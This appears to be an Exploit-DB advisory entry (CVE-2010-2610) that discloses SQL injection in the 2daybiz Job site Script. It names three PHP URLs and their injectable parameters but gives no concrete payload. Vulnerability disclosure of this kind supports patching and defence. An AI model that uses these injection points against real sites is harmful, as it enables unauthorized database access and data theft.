2daybiz Job site Script SQL injection

2010-06-24T00:00:00
ID EDB-ID:14025
Type exploitdb
Reporter Sangteamtham
Modified 2010-06-24T00:00:00

Description

2daybiz Job site Script SQL injection. CVE-2010-2610. Webapps exploit for php platform

                                        
                                            $-------------------------------------------------------------------------------------------------------------------
$ 2daybiz Job site Script SQL injection
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.2daybiz.com/realestate_portalscript.html
$ Date :06/24/2010
$
$******************************************************************************************
$Exploit:
$
$ http://server/view_current_job.php?jid=[id number][SQL]
$ http://server/show_search_more.php?job_iid=[id number][SQL]
$ http://server/show_search_result.php?left_cat=[id number][SQL]
$
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for
more security
$
$
$--------------------------------------------------------------------------------------------------------------------